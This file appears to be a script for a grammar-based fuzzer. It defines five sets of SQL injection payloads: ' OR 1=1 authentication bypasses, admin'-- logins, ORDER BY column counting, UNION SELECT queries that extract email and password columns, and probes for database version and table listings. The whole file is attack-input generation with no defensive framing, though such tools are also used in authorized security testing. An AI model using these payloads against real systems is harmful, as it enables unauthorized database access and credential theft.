G1=FCGFuzzer()
G1.Definition("opening_Bracket", ["("])
G1.Definition("single_Quote", ["' "])
G1.Definition("or", ["OR "])
G1.Definition("condition", ["1=1","'1'='1'"])
G1.Definition("apostrophe_OR_Space", [";"," "])
G1.Definition("comment", ["--","#","/*"])
G1.Definition("closing_Bracket", [")"])
G1.grammar_input_Parser('O',"opening_Bracket")
G1.grammar_input_Parser('C',"single_Quote")
G1.grammar_input_Parser('C',"or")
G1.grammar_input_Parser('C',"condition")
G1.grammar_input_Parser('O',"apostrophe_OR_Space")
G1.grammar_input_Parser('C',"comment")
G1.grammar_input_Parser('O',"closing_Bracket")
G1.grammarFuzzer()

G2=FCGFuzzer()
G2.Definition("administrator", ["admin","administrator","Admin","Administrator"])
G2.Definition("single_Quote", ["'"])
G2.Definition("apostrophe_OR_Space", [";"," "])
G2.Definition("comment", ["--","#","/*"])
G2.grammar_input_Parser('C',"administrator")
G2.grammar_input_Parser('C',"single_Quote")
G2.grammar_input_Parser('O',"apostrophe_OR_Space")
G2.grammar_input_Parser('C',"comment")
G2.grammarFuzzer()

G3=FCGFuzzer()
G3.Definition("opening_Bracket", ["("])
G3.Definition("single_Quote", ["' "])
G3.Definition("orderby", ["ORDER BY "])
G3.Definition("Number", ["0","1","2","3","4","5","6","7","8","9"])
G3.Definition("apostrophe_OR_Space", [";"," "])
G3.Definition("comment", ["--","#","/*"])
G3.Definition("closing_Bracket", [")"])
G3.grammar_input_Parser('O',"opening_Bracket")
G3.grammar_input_Parser('C',"single_Quote")
G3.grammar_input_Parser('C',"orderby")
G3.grammar_input_Parser('C',"Number")
G3.grammar_input_Parser('O',"Number")
G3.grammar_input_Parser('O',"Number")
G3.grammar_input_Parser('O',"Number")
G3.grammar_input_Parser('O',"apostrophe_OR_Space")
G3.grammar_input_Parser('C',"comment")
G3.grammar_input_Parser('O',"closing_Bracket")
G3.grammarFuzzer()

G4=FCGFuzzer()
G4.Definition("opening_Bracket", ["(","["])
G4.Definition("single_Quote", ["' "])
G4.Definition("union_select", ["UNION select "])
G4.Definition("Null", ["NULL"])
G4.Definition("Comma", [","])
G4.Definition("email", ["email"])
G4.Definition("pass", ["pass","password"])
G4.Definition("apostrophe_OR_Space", [";"," "])
G4.Definition("Dual", ["from DUAL","from user"])
G4.Definition("comment", ["--","#","/*"])
G4.Definition("closing_Bracket", [")"])
G4.Definition("Space",[" "])
G4.grammar_input_Parser('O',"opening_Bracket")
G4.grammar_input_Parser('C',"single_Quote"),
G4.grammar_input_Parser('O',"closing_Bracket")
G4.grammar_input_Parser('O',"Space")
G4.grammar_input_Parser('C',"union_select"),
G4.grammar_input_Parser('O',"Null")
G4.grammar_input_Parser('O',"Comma")
G4.grammar_input_Parser('O',"email")
G4.grammar_input_Parser('O',"Comma")
G4.grammar_input_Parser('O',"pass")
G4.grammar_input_Parser('O',"Comma")
G4.grammar_input_Parser('O',"Null")
G4.grammar_input_Parser('O',"Comma")
G4.grammar_input_Parser('O',"Dual")
G4.grammar_input_Parser('O',"apostrophe_OR_Space")
G4.grammar_input_Parser('C',"comment"),
G4.grammar_input_Parser('O',"closing_Bracket")
G4.grammarFuzzer()

G5=FCGFuzzer()
G5.Definition("opening_Bracket", ["("])
G5.Definition("single_Quote", ["' "]),
G5.Definition("union_select", ["UNION select "])
G5.Definition("Null", ["NULL"])
G5.Definition("Comma", [","])
G5.Definition("string_Check", ["a"])
G5.Definition("Version_OR_Database_Content", ["@@version","version()","version FROM v$instance","banner FROM v$version","* FROM all_tables","* FROM information_schema.tables","* from users","* from user"])
G5.Definition("apostrophe_OR_Space", [";"," "])
G5.Definition("comment", ["--","#","/*"])
G5.Definition("closing_Bracket", [")"])
G5.grammar_input_Parser('O',"opening_Bracket")
G5.grammar_input_Parser('C',"single_Quote")
G5.grammar_input_Parser('C',"union_select")
G5.grammar_input_Parser('O',"Version_OR_Database_Content")
G5.grammar_input_Parser('O',"apostrophe_OR_Space")
G5.grammar_input_Parser('C',"comment")
G5.grammar_input_Parser('O',"closing_Bracket")
G5.grammarFuzzer()